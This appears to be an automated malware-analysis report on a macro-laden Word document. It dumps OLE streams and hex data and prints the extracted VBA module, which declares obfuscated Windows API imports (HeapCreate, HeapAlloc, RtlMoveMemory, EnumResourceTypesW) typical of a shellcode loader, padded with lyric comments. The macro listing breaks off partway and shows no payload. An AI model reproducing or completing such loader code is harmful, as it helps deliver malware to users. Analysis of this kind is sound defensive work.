VBA File Name: andosite.bas, Stream Size: 16341

General
Stream Path:	Macros/VBA/andosite
VBA File Name:	andosite.bas
Stream Size:	16341
Data ASCII:	. . . . . , . . . . . . . . . . . . . . . . . . . . . . . . / . . . . . . . . . . . . n l . . . . . . . . . . . . . . . . . . < . . . . . . . . . s . . . o . . . . . . . . . R t l M o v e M e m o r y . . . . . . . 8 . . . . . . . . . . . . . . . S e l e c t O b j e c t . . . . . . . . \\ . . . $ . . . . . . . . . . . G e t P r i o r i t y C l a s s . . . . . . . . . . . . H . . . . . . . . . . . E n d D i a l o g . . . . . . . . . . . p . . . . . . . . . . . C r e a t e E v e n t A . . . . . . . . . . . . .
Data Raw:	01 16 01 00 00 2c 02 00 00 10 0d 00 00 10 02 00 00 c4 02 00 00 ff ff ff ff 17 0d 00 00 b3 2f 00 00 00 00 00 00 01 00 00 00 af d1 6e 6c 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 3c 01 00 00 00 00 e8 02 14 00 73 00 ff ff 6f 00 00 00 00 00 00 00 00 00 52 74 6c 4d 6f 76 65 4d 65 6d 6f 72 79 00 00 00 00 00 f0 02 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 53 65 6c 65 63

VBA Code with Deobfuscations

Attribute VB_Name = "andosite"

'kau na Jamajci gandu prodaju na kilo

'i da okus bude bolji s kaikom Vegete

#If Win64 Then

'Kau nee nikad prestat' glave da nam pune

'Sve dok je ovaca nee falit' vune

Public Declare PtrSafe Function inserted Lib "kernel32" Alias "CreateEventA" (lpEventAttributes As Any,bManualReset As LongPtr,bInitialState As LongPtr,lpName As String)

    'Kau nemoj vode vru, kod nas propuh ubija

    'Kau to je babi milo to joj se i snilo

    Public  Declare PtrSafe Function impissation Lib "kernel32" Alias "HeapCreate" (ByVal abortive As LongPtr, ByVal gyratory As LongPtr, ByVal soldering As LongPtr) As LongPtr

    'Sve dok je ovaca nee falit' vune

    'i da su nas banke uvukle u krizu

    Public  Declare PtrSafe Sub methyltestosterone Lib "ntdll" Alias "RtlMoveMemory" (pDst As Any, pSrc As Any, ByVal ByteLen As LongPtr)

    'Spale su nam gae, zagrizli smo udice

    'Od Vatikana do Irana

    Public Declare PtrSafe Function collinear Lib "gdi32" Alias "SelectObject" (hdc As Any,hgdiobj As LongPtr)

    'i da su nas banke uvukle u krizu

    'Kau nee nikad prestat' glave da nam pune

    Public Declare PtrSafe Function cyclosporeae Lib "kernel32" Alias "GetPriorityClass" (hProcess As LongPtr) As LongPtr

    'Kau opet Iran pravi nuklearne bombe

    'Od Vatikana do Irana

    Public Declare PtrSafe Function substituted Lib "user32" Alias "CopyIcon" (ByVal hIcon As LongPtr) As LongPtr

    'Kau nemoj vode vru, kod nas propuh ubija

    'Spale su nam gae, zagrizli smo udice

    Public Declare PtrSafe Function nard Lib "user32" Alias "EndDialog" (ByVal hDlg As LongPtr,nResult As LongPtr) As LongPtr

    'Kau nemoj vode vru, kod nas propuh ubija

    'kau na Jamajci gandu prodaju na kilo

    Public  Declare PtrSafe Function arranger Lib "kernel32" Alias "EnumResourceTypesW" (ByVal hModule As Any, ByVal lpEnumFunc As Any, lParam As Any) As LongPtr

    'Spale su nam gae, zagrizli smo udice

    'majmunu je dovoljna banana

    Public  Declare PtrSafe Function plevna Lib "kernel32" Alias "HeapAlloc" (ByVal asterismal As LongPtr, ByVal cholelithiasis As LongPtr, ByVal enveloping As LongPtr) As LongPtr

    'Od Vatikana do Irana

    'Mene tjeraju na izbore svake dvije godine

    

    'Kau da malu djecu donosi nam roda

    'Mene tjeraju na izbore svake dvije godine

    #Else

    'udotvorni sapun protiv tvrdokornih mrlja

    'Mene tjeraju na izbore svake dvije godine

    Public Declare Sub methyltestosterone Lib "ntdll" Alias "RtlMoveMemory" (pDst As Any, pSrc As Any, ByVal ByteLen As Long)

    'Kau opet Iran pravi nuklearne bombe

    'Glave nam u pijesku, nezatiene guzice

    Public Declare Function overseer Lib "gdi32" Alias "SelectObject" (hdc As Any, hgdiobj As Long)

    'Kau nee nikad prestat' glave da nam pune

    'majmunu je dovoljna banana

    Public Declare Function grains Lib "kernel32" Alias "GetPriorityClass" (hProcess As Long) As Long

    'Kau nee nikad prestat' glave da nam pune

    'Sve dok je ovaca nee falit' vune

    Public Declare Function ninnyhammer Lib "user32" Alias "EndDialog" (ByVal hDlg As Long, nResult As Long) As Long

    'i da smo na vrhu liste po odlivu "mozaka"

    'Kau da je Bosna samo drava za roaka

    Public Declare Function beige Lib "kernel32" Alias "CreateEventA" (lpEventAttributes As Any, bManualReset As Long, bInitialState As Long, lpName As String)

    'Kau da je Bosna samo drava za roaka

    'Kau da je Bosna samo drava za roaka

    Public Declare Function arranger Lib "kernel32" Alias "EnumResourceTypesW" (ByVal hModule As Any, ByVal lpEnumFunc As Any, lParam As Any) As Long

    'Kau da je Bosna samo drava za roaka

    'Kau da je Bosna samo drava za roaka

    Public Declare Function lyking Lib "user32" Alias "CopyIcon" (hIcon As Long) As Long

    'Kau da je smak svijeta relativno blizu

    'igrali smo dobro ali zajeb'o nas sudija

    Public Declare Function plevna Lib "kernel32" Alias "HeapAlloc" (ByVal reportable As Long, ByVal melanosis As Long, ByVal macrencephaly As Long) As Long

    'Kau nee nikad prestat' glave da nam pune

VBA Code

Attribute VB_Name = "andosite"
'kau na Jamajci gandu prodaju na kilo
'i da okus bude bolji s kaikom Vegete
#If Win64 Then
'Kau nee nikad prestat' glave da nam pune
'Sve dok je ovaca nee falit' vune
Public Declare PtrSafe Function inserted Lib "kernel32" Alias "CreateEventA" (lpEventAttributes As Any,bManualReset As LongPtr,bInitialState As LongPtr,lpName As String)
'Kau nemoj vode vru, kod nas propuh ubija
'Kau to je babi milo to joj se i snilo
Public  Declare PtrSafe Function impissation Lib "kernel32" Alias "HeapCreate" (ByVal abortive As LongPtr, ByVal gyratory As LongPtr, ByVal soldering As LongPtr) As LongPtr
'Sve dok je ovaca nee falit' vune
'i da su nas banke uvukle u krizu
Public  Declare PtrSafe Sub methyltestosterone Lib "ntdll" Alias "RtlMoveMemory" (pDst As Any, pSrc As Any, ByVal ByteLen As LongPtr)
'Spale su nam gae, zagrizli smo udice
'Od Vatikana do Irana
Public Declare PtrSafe Function collinear Lib "gdi32" Alias "SelectObject" (hdc As Any,hgdiobj As LongPtr)
'i da su nas banke uvukle u krizu
'Kau nee nikad prestat' glave da nam pune
Public Declare PtrSafe Function cyclosporeae Lib "kernel32" Alias "GetPriorityClass" (hProcess As LongPtr) As LongPtr
'Kau opet Iran pravi nuklearne bombe
'Od Vatikana do Irana
Public Declare PtrSafe Function substituted Lib "user32" Alias "CopyIcon" (ByVal hIcon As LongPtr) As LongPtr
'Kau nemoj vode vru, kod nas propuh ubija
'Spale su nam gae, zagrizli smo udice
Public Declare PtrSafe Function nard Lib "user32" Alias "EndDialog" (ByVal hDlg As LongPtr,nResult As LongPtr) As LongPtr
'Kau nemoj vode vru, kod nas propuh ubija
'kau na Jamajci gandu prodaju na kilo
Public  Declare PtrSafe Function arranger Lib "kernel32" Alias "EnumResourceTypesW" (ByVal hModule As Any, ByVal lpEnumFunc As Any, lParam As Any) As LongPtr
'Spale su nam gae, zagrizli smo udice
'majmunu je dovoljna banana
Public  Declare PtrSafe Function plevna Lib "kernel32" Alias "HeapAlloc" (ByVal asterismal As LongPtr, ByVal cholelithiasis As LongPtr, ByVal enveloping As LongPtr) As LongPtr
'Od Vatikana do Irana
'Mene tjeraju na izbore svake dvije godine

'Kau da malu djecu donosi nam roda
'Mene tjeraju na izbore svake dvije godine
#Else
'udotvorni sapun protiv tvrdokornih mrlja
'Mene tjeraju na izbore svake dvije godine
Public Declare Sub methyltestosterone Lib "ntdll" Alias "RtlMoveMemory" (pDst As Any, pSrc As Any, ByVal ByteLen As Long)
'Kau opet Iran pravi nuklearne bombe
'Glave nam u pijesku, nezatiene guzice
Public Declare Function overseer Lib "gdi32" Alias "SelectObject" (hdc As Any, hgdiobj As Long)
'Kau nee nikad prestat' glave da nam pune
'majmunu je dovoljna banana
Public Declare Function grains Lib "kernel32" Alias "GetPriorityClass" (hProcess As Long) As Long
'Kau nee nikad prestat' glave da nam pune
'Sve dok je ovaca nee falit' vune
Public Declare Function ninnyhammer Lib "user32" Alias "EndDialog" (ByVal hDlg As Long, nResult As Long) As Long
'i da smo na vrhu liste po odlivu "mozaka"
'Kau da je Bosna samo drava za roaka
Public Declare Function beige Lib "kernel32" Alias "CreateEventA" (lpEventAttributes As Any, bManualReset As Long, bInitialState As Long, lpName As String)
'Kau da je Bosna samo drava za roaka
'Kau da je Bosna samo drava za roaka
Public Declare Function arranger Lib "kernel32" Alias "EnumResourceTypesW" (ByVal hModule As Any, ByVal lpEnumFunc As Any, lParam As Any) As Long
'Kau da je Bosna samo drava za roaka
'Kau da je Bosna samo drava za roaka
Public Declare Function lyking Lib "user32" Alias "CopyIcon" (hIcon As Long) As Long
'Kau da je smak svijeta relativno blizu
'igrali smo dobro ali zajeb'o nas sudija
Public Declare Function plevna Lib "kernel32" Alias "HeapAlloc" (ByVal reportable As Long, ByVal melanosis As Long, ByVal macrencephaly As Long) As Long
'Kau nee nikad prestat' glave da nam pune
'igrali smo dobro ali zajeb'o nas sudija
Public Declare Function impissation Lib "kernel32" Alias "HeapCreate" (ByVal relentless As Long, ByVal definable As Long, ByVal indefectibility As Long) As Long
'i da su nas bank

VBA File Name: crappie.frm, Stream Size: 1158

General
Stream Path:	Macros/VBA/crappie
VBA File Name:	crappie.frm
Stream Size:	1158
Data ASCII:	. . . . . . . . . @ . . . . . . . L . . . . . . . G . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 00 f0 00 00 00 40 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 47 03 00 00 9b 03 00 00 00 00 00 00 01 00 00 00 af d1 f3 89 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code with Deobfuscations

Attribute VB_Name = "crappie"

Attribute VB_Base = "0{9AD81DE8-62E1-4795-AE66-E0FE682BA917}{5B5AFF87-D297-46C7-8183-E8213D3D5C4C}"

Attribute VB_GlobalNameSpace = False

Attribute VB_Creatable = False

Attribute VB_PredeclaredId = True

Attribute VB_Exposed = False

Attribute VB_TemplateDerived = False

Attribute VB_Customizable = False

VBA Code

Attribute VB_Name = "crappie"
Attribute VB_Base = "0{9AD81DE8-62E1-4795-AE66-E0FE682BA917}{5B5AFF87-D297-46C7-8183-E8213D3D5C4C}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 144

General
Stream Path:	\x1CompObj
File Type:	data
Stream Size:	144
Entropy:	3.91953852555
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q > . . . . . > . : . C . < . 5 . = . B . . M . i . c . r . o . s . o . f . t . . O . f . f . i . c . e . . W . o . r . d . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 3e 00 00 00 14 04 3e 04 3a 04 43 04 3c 04 35 04 3d 04 42 04 20 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 4f 00 66 00 66 00 69 00 63 00 65 00 20 00 57 00

Stream Path: \x5DocumentSummaryInformation, File Type: FoxPro FPT, blocks size 512, next free block index 4278124544, Stream Size: 4096

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	FoxPro FPT, blocks size 512, next free block index 4278124544
Stream Size:	4096
Entropy:	0.303043979959
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 05 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 04 01 00 00 0d 00 00 00 01 00 00 00 70 00 00 00 0f 00 00 00 78 00 00 00 04 00 00 00 84 00 00 00 05 00 00 00 8c 00 00 00 06 00 00 00 94 00 00 00 11 00 00 00 9c 00 00 00 17 00 00 00 a4 00 00 00 0b 00 00 00 ac 00 00 00 10 00 00 00 b4 00 00 00

Stream Path: \x5SummaryInformation, File Type: FoxPro FPT, blocks size 512, next free block index 4278124544, Stream Size: 4096

General
Stream Path:	\x5SummaryInformation
File Type:	FoxPro FPT, blocks size 512, next free block index 4278124544
Stream Size:	4096
Entropy:	0.458075214693
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . l . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 4 . . . . . . . @ . . . . . . . L . . . . . . . T . . . . . . . \\ . . . . . . . d . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . H e l e n . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 05 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 6c 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 a4 00 00 00 04 00 00 00 b0 00 00 00 05 00 00 00 c0 00 00 00 06 00 00 00 cc 00 00 00 07 00 00 00 d8 00 00 00 08 00 00 00 ec 00 00 00 09 00 00 00 fc 00 00 00

Stream Path: 1Table, File Type: FoxPro FPT, blocks size 256, next free block index 2248281856, Stream Size: 4096

General
Stream Path:	1Table
File Type:	FoxPro FPT, blocks size 256, next free block index 2248281856
Stream Size:	4096
Entropy:	2.22928850159
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	86 02 0f 00 12 00 01 00 9c 00 0f 00 04 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: Data, File Type: data, Stream Size: 50523

General
Stream Path:	Data
File Type:	data
Stream Size:	50523
Entropy:	5.60731034209
Base64 Encoded:	True
Data ASCII:	[ . . . D . d . . . . . . . . . . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D . . . . . . . . . . . . . . . . . . . C . . . . . . . A . . . . . . . . . . . . . . . . . . . . . . p . i . c . . . . . . . . . . . . . . . b . . . . . . . . . i . D 8 . 2 s p . h S . . . ` N . . . . . . . . . . D . . . . . . . . n . . . . . . i . D 8 . 2 s p . h S . . . ` N . . P N G . . . . . . . . I H D R . . . . . . . . . . . . . . . . . . . . . p H Y s . .
Data Raw:	5b c5 00 00 44 00 64 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 0f 00 35 05 e8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 44 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 43 00 0b f0 20 00 00 00 04 41 01 00 00 00 05 c1 08 00 00 00 06 01 02 00 00 00 ff 01 00 00 08 00 70 00 69 00

Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 528

General
Stream Path:	Macros/PROJECT
File Type:	ASCII text, with CRLF line terminators
Stream Size:	528
Entropy:	5.37335735734
Base64 Encoded:	True
Data ASCII:	I D = " { C 6 8 C D A 7 A - 2 9 A 4 - 4 B B 3 - A 4 B B - 3 5 5 1 F E 6 2 6 9 1 A } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . M o d u l e = a n d o s i t e . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . B a s e C l a s s = c r a p p i e . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 3 B 3 9 3 8 0 7 7 7 0 B 7 7 0 B 7 7 0 B
Data Raw:	49 44 3d 22 7b 43 36 38 43 44 41 37 41 2d 32 39 41 34 2d 34 42 42 33 2d 41 34 42 42 2d 33 35 35 31 46 45 36 32 36 39 31 41 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 61 6e 64 6f 73 69 74 65 0d 0a 50 61 63 6b 61 67 65 3d 7b 41 43 39 46 32 46 39 30 2d 45 38 37 37 2d 31 31 43 45 2d 39 46 36 38

Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 92

General
Stream Path:	Macros/PROJECTwm
File Type:	data
Stream Size:	92
Entropy:	3.25790113519
Base64 Encoded:	False
Data ASCII:	T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . a n d o s i t e . a . n . d . o . s . i . t . e . . . c r a p p i e . c . r . a . p . p . i . e . . . . .
Data Raw:	54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 61 6e 64 6f 73 69 74 65 00 61 00 6e 00 64 00 6f 00 73 00 69 00 74 00 65 00 00 00 63 72 61 70 70 69 65 00 63 00 72 00 61 00 70 00 70 00 69 00 65 00 00 00 00 00

Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 5887

General
Stream Path:	Macros/VBA/_VBA_PROJECT
File Type:	data
Stream Size:	5887
Entropy:	5.20766383872
Base64 Encoded:	True
Data ASCII:	. a y . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 1 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
Data Raw:	cc 61 79 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 06 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00

Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 843

General
Stream Path:	Macros/VBA/dir
File Type:	data
Stream Size:	843
Entropy:	6.49606511643
Base64 Encoded:	True
Data ASCII:	. G . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . . . . Y . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ s y s t e m 3 . 2 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E N o r m a l . . E N . C r . m . a Q . F . . . . . . . * . \\ C . . . . . < . Y .
Data Raw:	01 47 b3 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 ff e2 b2 59 06 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30

Stream Path: Macros/crappie/\x1CompObj, File Type: data, Stream Size: 97

General
Stream Path:	Macros/crappie/\x1CompObj
File Type:	data
Stream Size:	97
Entropy:	3.61064918306
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: Macros/crappie/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 312

General
Stream Path:	Macros/crappie/\x3VBFrame
File Type:	ASCII text, with CRLF line terminators
Stream Size:	312
Entropy:	4.5489278468
Base64 Encoded:	True
Data ASCII:	V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } c r a p p i e . . C a p t i o n = " h e u r e " . . C l i e n t H e i g h t = 4 5 1 5 . . C l i e n t L e f t = 4 5 . . C l i e n t T o p = 3 7 5 . . C l i e n t W i d t h = 3 9 0 0 . . H e l p C o n t e x t I D = 4 4 . . S t a r t U p P o s i t
Data Raw:	56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 63 72 61 70 70 69 65 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 68 65 75 72 65 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20 20 20 34 35 31 35

Stream Path: Macros/crappie/f, File Type: data, Stream Size: 9176

General
Stream Path:	Macros/crappie/f
File Type:	data
Stream Size:	9176
Entropy:	5.34937606033
Base64 Encoded:	True
Data ASCII:	. . , . . . . . n \| . . . . . . . . . . . . . . . . . . . } . . . . . . . . . . . . . . . . . . . R . . . . . . . . . . . K . Q l t . . f . . . . . . . . . . . . . . . . . ( . . . F . . . . . . . . . . . h . . . n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	00 04 2c 00 8a 0e a0 0e 6e 7c dd 00 01 00 00 00 01 07 ff ff 01 01 00 00 02 00 00 00 00 7d 00 00 df 1a 00 00 1c 1f 00 00 00 00 00 00 00 00 00 00 04 52 e3 0b 91 8f ce 11 9d e3 00 aa 00 4b b8 51 6c 74 00 00 66 12 00 00 00 00 01 00 04 00 10 10 10 00 01 00 04 00 28 01 00 00 46 00 00 00 10 10 00 00 01 00 08 00 68 05 00 00 6e 01 00 00 20 20 10 00 01 00 04 00 e8 02 00 00 d6 06 00 00 20 20

Stream Path: Macros/crappie/i01/\x1CompObj, File Type: data, Stream Size: 112

General
Stream Path:	Macros/crappie/i01/\x1CompObj
File Type:	data
Stream Size:	112
Entropy:	4.6011544911
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . n ` . . . . . . . . ` . . . . . . M i c r o s o f t F o r m s 2 . 0 F r a m e . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . F r a m e . 1 . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 20 20 18 6e 60 f4 ce 11 9b cd 00 aa 00 60 8e 01 1a 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 72 61 6d 65 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 0e 00 00 00 46 6f 72 6d 73 2e 46 72 61 6d 65 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: Macros/crappie/i01/f, File Type: data, Stream Size: 48

General
Stream Path:	Macros/crappie/i01/f
File Type:	data
Stream Size:	48
Entropy:	2.34371071693
Base64 Encoded:	False
Data ASCII:	. . $ . B . . . n \| . . . . . . . . . . . } . . d . . . p . . . . . . . . . . . . . . . . . . .
Data Raw:	00 04 24 00 42 0c 02 08 6e 7c dd 00 04 80 00 00 03 00 00 00 00 7d 00 00 64 18 00 00 70 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: Macros/crappie/i01/o, File Type: empty, Stream Size: 0

General
Stream Path:	Macros/crappie/i01/o
File Type:	empty
Stream Size:	0
Entropy:	0.0
Base64 Encoded:	False
Data ASCII:
Data Raw:

Stream Path: Macros/crappie/o, File Type: empty, Stream Size: 0

General
Stream Path:	Macros/crappie/o
File Type:	empty
Stream Size:	0
Entropy:	0.0
Base64 Encoded:	False
Data ASCII:
Data Raw:

Stream Path: WordDocument, File Type: data, Stream Size: 52501

General
Stream Path:	WordDocument
File Type:	data
Stream Size:	52501
Entropy:	7.46691549854
Base64 Encoded:	True
Data ASCII:	. . . . q ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . b j b j q P q P . . . . . . . . . . . . . . . . . . . . . . . . . . . : . . . : . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . " . . . . . . . " . . . . . . . " . . . . . . . " . . . . .
Data Raw:	ec a5 c1 00 71 60 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 06 00 00 03 08 00 00 0e 00 62 6a 62 6a 71 50 71 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 04 16 00 15 cd 00 00 13 3a 01 00 13 3a 01 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

